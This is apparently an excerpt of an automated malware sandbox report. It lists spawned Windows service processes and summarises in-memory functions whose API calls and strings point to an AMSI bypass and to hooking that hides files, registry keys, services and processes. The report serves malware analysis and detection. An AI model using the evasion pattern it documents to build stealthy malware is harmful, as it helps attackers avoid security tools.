Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	03:43:17
Start date:	04/10/2024
Path:	C:\Windows\System32\wbem\WMIADAP.exe
Wow64 process (32bit):	false
Commandline:	wmiadap.exe /F /T /R
Imagebase:	0x7ff7fb760000
File size:	182'272 bytes
MD5 hash:	1BFFABBD200C850E6346820E92B915DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	03:43:17
Start date:	04/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	03:43:18
Start date:	04/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	03:43:18
Start date:	04/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	03:43:20
Start date:	04/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	03:43:20
Start date:	04/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	51
Start time:	03:43:20
Start date:	04/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	52
Start time:	03:43:21
Start date:	04/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	53
Start time:	03:43:22
Start date:	04/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	54
Start time:	03:43:23
Start date:	04/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	55
Start time:	03:43:23
Start date:	04/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	56
Start time:	03:43:24
Start date:	04/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	57
Start time:	03:43:25
Start date:	04/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	58
Start time:	03:43:25
Start date:	04/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	653
Start time:	03:43:37
Start date:	04/10/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	671
Start time:	03:43:45
Start date:	04/10/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	12.6%
Total number of Nodes:	1749
Total number of Limit Nodes:	2

Executed Functions

Function 0000022413901E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000022413901E47
GetProcAddress.KERNEL32 ref: 0000022413901E57
SleepEx.KERNELBASE ref: 0000022413901E67

Strings

AmsiScanBuffer, xrefs: 0000022413901E50
amsi.dll, xrefs: 0000022413901E40

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: eebeb8a29fa49e01195493694a2b93b69af760d161bceaf177bfc175cfd01240
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 7BD06764A32640F6EE097BD1E85D3583A61AB64F59FC90415CD0E192A8DF2C8DF98740

Function 0000022413901E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000022413901E7F

Part of subcall function 00000224139022A8: GetModuleHandleA.KERNEL32(?,?,?,0000022413901EB1), ref: 00000224139022C0
Part of subcall function 00000224139022A8: GetProcAddress.KERNEL32(?,?,?,0000022413901EB1), ref: 00000224139022D1

CreateThread.KERNELBASE ref: 0000022413902043
TlsAlloc.KERNEL32 ref: 0000022413902049
TlsAlloc.KERNEL32 ref: 0000022413902055
TlsAlloc.KERNEL32 ref: 0000022413902061
TlsAlloc.KERNEL32 ref: 000002241390206D
TlsAlloc.KERNEL32 ref: 0000022413902079
TlsAlloc.KERNEL32 ref: 0000022413902085

Strings

NtEnumerateValueKey, xrefs: 0000022413901F36
NtQueryDirectoryFile, xrefs: 0000022413901EDF
NtResumeThread, xrefs: 0000022413901EC2
amsi.dll, xrefs: 0000022413902019
PdhGetRawCounterArrayW, xrefs: 0000022413901FD0
pdh.dll, xrefs: 0000022413901FD7, 0000022413901FF8
ntdll.dll, xrefs: 0000022413901E8D
PdhGetFormattedCounterArrayW, xrefs: 0000022413901FF1
sechost.dll, xrefs: 0000022413901F99
NtQueryDirectoryFileEx, xrefs: 0000022413901EFC
AmsiScanBuffer, xrefs: 0000022413902012
EnumServiceGroupW, xrefs: 0000022413901F50
advapi32.dll, xrefs: 0000022413901F57, 0000022413901F78
NtEnumerateKey, xrefs: 0000022413901F19
NtQuerySystemInformation, xrefs: 0000022413901EA5
NtDeviceIoControlFile, xrefs: 0000022413901FB6
EnumServicesStatusExW, xrefs: 0000022413901F71, 0000022413901F92

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: a8a089ed4d0a3858e3c828d528970c5a6fa3cb24ef171cfa9fbaafc62c612bfe
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 81517FA8130A4AB6EF05FFE8E8497D43B24A74476CF8445529C4D1A16DDF388AFAC780

Function 0000022413903A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000022413903A35
PathFindFileNameW.SHLWAPI ref: 0000022413903A44

Part of subcall function 0000022413903F88: StrCmpNIW.SHLWAPI(?,?,?,000002241390272F), ref: 0000022413903FA0

Part of subcall function 0000022413903EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000022413903A5B), ref: 0000022413903EDB
Part of subcall function 0000022413903EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022413903A5B), ref: 0000022413903F0E
Part of subcall function 0000022413903EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022413903A5B), ref: 0000022413903F2E
Part of subcall function 0000022413903EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022413903A5B), ref: 0000022413903F47
Part of subcall function 0000022413903EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022413903A5B), ref: 0000022413903F68

CreateThread.KERNELBASE ref: 0000022413903A8B

Part of subcall function 0000022413901E74: GetCurrentThread.KERNEL32 ref: 0000022413901E7F
Part of subcall function 0000022413901E74: CreateThread.KERNELBASE ref: 0000022413902043
Part of subcall function 0000022413901E74: TlsAlloc.KERNEL32 ref: 0000022413902049
Part of subcall function 0000022413901E74: TlsAlloc.KERNEL32 ref: 0000022413902055
Part of subcall function 0000022413901E74: TlsAlloc.KERNEL32 ref: 0000022413902061
Part of subcall function 0000022413901E74: TlsAlloc.KERNEL32 ref: 000002241390206D
Part of subcall function 0000022413901E74: TlsAlloc.KERNEL32 ref: 0000022413902079
Part of subcall function 0000022413901E74: TlsAlloc.KERNEL32 ref: 0000022413902085

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: 497626b688fa208a2d0e75bd0d1a95d2d2150a163d6f07e6c1532d26b3d1371f
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: A1114C79630A01B2FF60F7E0A58D39A3A98A79435DF504129DC0EA91DCEF78C8F48600

Function 000002241390F598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 000002241390F611
GetFileType.KERNELBASE ref: 000002241390F627

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: d76ab1b63436527dd2fd55dd6876ec577c9a221d3f9b6f45a8d40b37e7fb72ec
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: 86316D22620B48A1EB60AB54958826D3B58F345BB8F690309DF6F5B3F8CB35D9F5D340

Function 000002241393F598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 000002241393F611
GetFileType.KERNELBASE ref: 000002241393F627

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: b2f5a0ae9d7adcffb3a5536e8cdbbb616dfc05b995ba303f969827cf16ec9179
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: 7F317062620B48A1DF60AB6496882693F50F345BA8F640309DFAF4B3F8CB35D4F5D340

Function 00000224138D2EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 00000224138D302E

Memory Dump Source

Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: c66b6f17edb6aed950081c1acac2aef9e72592f04daf45e015d68e73afa786b0
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: B4911573B0125197EF64AF65D408B6DBBD1FB54B9CF588124AE4D0B788DB38E8A2C710

Function 0000022413901BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000022413901724: GetProcessHeap.KERNEL32 ref: 000002241390172F
Part of subcall function 0000022413901724: HeapAlloc.KERNEL32 ref: 000002241390173E
Part of subcall function 0000022413901724: RegOpenKeyExW.ADVAPI32 ref: 00000224139017AE
Part of subcall function 0000022413901724: RegOpenKeyExW.ADVAPI32 ref: 00000224139017DB
Part of subcall function 0000022413901724: RegCloseKey.ADVAPI32 ref: 00000224139017F5
Part of subcall function 0000022413901724: RegOpenKeyExW.ADVAPI32 ref: 0000022413901815
Part of subcall function 0000022413901724: RegCloseKey.ADVAPI32 ref: 0000022413901830
Part of subcall function 0000022413901724: RegOpenKeyExW.ADVAPI32 ref: 0000022413901850
Part of subcall function 0000022413901724: RegCloseKey.ADVAPI32 ref: 000002241390186B
Part of subcall function 0000022413901724: RegOpenKeyExW.ADVAPI32 ref: 000002241390188B
Part of subcall function 0000022413901724: RegCloseKey.ADVAPI32 ref: 00000224139018A6
Part of subcall function 0000022413901724: RegOpenKeyExW.ADVAPI32 ref: 00000224139018C6

SleepEx.KERNELBASE ref: 0000022413901BDF

Part of subcall function 0000022413901724: RegCloseKey.ADVAPI32 ref: 00000224139018E1
Part of subcall function 0000022413901724: RegOpenKeyExW.ADVAPI32 ref: 0000022413901901
Part of subcall function 0000022413901724: RegCloseKey.ADVAPI32 ref: 000002241390191C
Part of subcall function 0000022413901724: RegOpenKeyExW.ADVAPI32 ref: 000002241390193C
Part of subcall function 0000022413901724: RegCloseKey.ADVAPI32 ref: 0000022413901957
Part of subcall function 0000022413901724: RegOpenKeyExW.ADVAPI32 ref: 0000022413901977
Part of subcall function 0000022413901724: RegCloseKey.ADVAPI32 ref: 0000022413901992
Part of subcall function 0000022413901724: RegCloseKey.ADVAPI32 ref: 000002241390199C

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: 9c0cdb6d02bcc8beafeba063a33bbb3d7e345248edf6c49f588808c222826217
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: 2431CEED220A51B1FF50BBA6D54A3693BE9AB44BD8F045421DE0D8F79EDF24C8F08214

Non-executed Functions

Function 0000022413902FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000022413903094
lstrlenW.KERNEL32 ref: 00000224139032BE

Part of subcall function 0000022413901A30: OpenProcess.KERNEL32 ref: 0000022413901A56
Part of subcall function 0000022413901A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000022413901A74
Part of subcall function 0000022413901A30: PathFindFileNameW.SHLWAPI ref: 0000022413901A83
Part of subcall function 0000022413901A30: lstrlenW.KERNEL32 ref: 0000022413901A8F
Part of subcall function 0000022413901A30: StrCpyW.SHLWAPI ref: 0000022413901AA2
Part of subcall function 0000022413901A30: CloseHandle.KERNEL32 ref: 0000022413901AB0

GetProcAddress.KERNEL32 ref: 00000224139030A9

Part of subcall function 0000022413903F88: StrCmpNIW.SHLWAPI(?,?,?,000002241390272F), ref: 0000022413903FA0

StrCmpNIW.SHLWAPI ref: 00000224139030EC
lstrlenW.KERNEL32 ref: 0000022413903214

Strings

\Device\Nsi, xrefs: 00000224139030DF
NtQueryObject, xrefs: 000002241390309F
ntdll.dll, xrefs: 000002241390308D

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: faa7fcf7ab9cdbba3380709f1f11f8b4081d59ba603d0993fa58a43c1ac90868
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 62B19362230690A2EF55AFAAD58875ABBA8F744B9CF445016EE0D5B79CDF35CCE0C340

Function 0000022413932FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000022413933094
lstrlenW.KERNEL32 ref: 00000224139332BE

Part of subcall function 0000022413931A30: OpenProcess.KERNEL32 ref: 0000022413931A56
Part of subcall function 0000022413931A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000022413931A74
Part of subcall function 0000022413931A30: PathFindFileNameW.SHLWAPI ref: 0000022413931A83
Part of subcall function 0000022413931A30: lstrlenW.KERNEL32 ref: 0000022413931A8F
Part of subcall function 0000022413931A30: StrCpyW.SHLWAPI ref: 0000022413931AA2
Part of subcall function 0000022413931A30: CloseHandle.KERNEL32 ref: 0000022413931AB0

GetProcAddress.KERNEL32 ref: 00000224139330A9

Part of subcall function 0000022413933F88: StrCmpNIW.SHLWAPI(?,?,?,000002241393272F), ref: 0000022413933FA0

StrCmpNIW.SHLWAPI ref: 00000224139330EC
lstrlenW.KERNEL32 ref: 0000022413933214

Strings

\Device\Nsi, xrefs: 00000224139330DF
ntdll.dll, xrefs: 000002241393308D
NtQueryObject, xrefs: 000002241393309F

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: ab9313a2783b2c27c4f0a96b88eedfc967908d1178cd4875f63d8fc1c3dd74b5
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 14B183A2234690A2EF54AFB5D688799BBA4F744B88F445016EE0D5B7ACDF35CCE4C340

Function 00000224139084B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000224139084CC
RtlCaptureContext.NTDLL ref: 00000224139084F9
RtlLookupFunctionEntry.NTDLL ref: 0000022413908513
RtlVirtualUnwind.NTDLL ref: 0000022413908554
IsDebuggerPresent.KERNEL32 ref: 00000224139085A8
SetUnhandledExceptionFilter.KERNEL32 ref: 00000224139085C5
UnhandledExceptionFilter.KERNEL32 ref: 00000224139085D0

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
